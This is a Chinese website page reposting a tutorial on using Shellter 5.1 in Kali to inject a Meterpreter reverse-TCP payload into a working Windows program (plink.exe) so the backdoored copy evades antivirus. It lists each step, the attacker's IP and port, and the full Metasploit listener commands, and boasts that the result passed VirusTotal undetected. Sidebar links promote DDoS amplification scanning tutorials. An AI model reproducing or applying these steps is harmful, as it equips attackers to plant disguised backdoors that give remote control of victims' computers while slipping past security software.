设为首页收藏本站

安而遇随-随遇而安

 找回密码
 立即注册

QQ登录

只需一步,快速开始

搜索
安而遇随-随遇而安 首页 其他 工具 查看内容

Kali Shellter 5.1:动态ShellCode注入工具 绕过安全软件

2015-10-20 12:37| 发布者: 随便、先森。| 查看: 1682| 评论: 0|来自: freebuf

摘要: 或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒 ...

或许你还在为无法绕过反病毒软件获得Meterpreter shell而懊恼,试试Shellter 5.1吧。

首先需要获取一个正常的Windows exe可执行文件,然后它会将shellcode添加进去,这样就可以成功地修改这个文件并且使其绕过反病毒软件的监测了。Shellter有一个自动模式,该模式会使整个操作过程变得十分的简单。在这篇文章中,我使用Kali 2.0作为主机,另外一台Windows作为靶机。

0×01 磨刀:

Kali中不包含最新版本的Shellter,如果要获取最新版本需要下载、解压ZIP文件。

1.下载安装shellter https://www.shellterproject.com/download/

原文作者把下载下来的文件保存在了/root/Desktop 目录。

2.从Kali系统的“usr/share/windows-binaries”目录中找到“plink.exe”,然后将其拷贝至Shellter的文件夹中。

3.切换到 /root/Desktop/shellter 目录

0×02 砍柴:

4.从终端启动shellter

wine shellter.exe

5.键入“A”启用自动模式:

6.在提示PE目标时,输入:“plink.exe”

7.当询问是否启用隐身模式时输入:“Y”

在隐身模式新功能下,后门文件仍然具有原始文件的功能。

8.当提示输入Payloads时选择“L”然后选择“1” Meterpreter_Reverse_TCP

9.输入Kali主机的IP(原文作者使用192.168.1.39)

10.输入程序要使用的端口(原文作者使用4545)

Shellter将会在plink.exe中注入shellcode,这时你可能需要稍等一会儿。然后,你就可以看到:

这时你会在Shellter目录发现两个文件:‘plink.exe’(这个是被注入shellcode的后门文件)‘plink.exe.bak’(这个是原来的正常文件)

11.现在,我们需要在Kali系统中使用和之前相同的一些参数启动一个监听服务

msfconsole
use exploit/multi/handler
set payload windows/meterpreter/reverse_tcp
set lhost 192.168.1.39
set lport 4545
exploit

12.把‘plink.exe’复制到Windows系统

13.如果你在Windows系统里面运行plink.exe

这里列出了一些帮助信息,但这个操作并不会触发远程shell,但是当我们用plink进行远程登录的时候(这里登陆的是树莓派)如下图所示:

请注意,我们通过plink得到树莓派ssh的登录提示,同时,在kali中Metasploit也得到了一个session:

0×03 getshell

这时可以执行sysinfo获得靶机的一些系统信息:

译者注:

值得一提的是:与注入shellcode之前的程序相比,经过处理的后门程序的大小与原程序在大小上是完全一样的!更为重要的是把后门程序传到Virustotal网站并没有报毒(这个是2015年7月12日 用shellter 4.0制作的后门上传检测结果)。

*参考:Dark  Cyber 编译/0xroot


鲜花

握手

雷人

路过

鸡蛋

最新评论

  • 解决 Wn10无法连接 蓝牙耳
  • Python之Selenium知识总结
  • 2万字带你了解Selenium全攻
  • 解决网站网页不能复制,不
  • 我对ddos攻击的见解以及ufo
论坛精选
NTP放大反射DDOS攻击扫描教程,放大列表扫描教程
NTP放大反射DDOS攻
NTP放大反射DDOS攻击扫描教程,放大列表扫描教程 图上是国外测的 本文实测 能有二三
DDOS:NTP、SSDP、DNS、SNMP、RIP 放大反射攻击、扫描脚本
DDOS:NTP、SSDP、D
NTP、SSDP、DNS、SNMP、RIP 放大反射攻击扫描脚本 不懂的 请自行谷歌 声明:本文转
返回顶部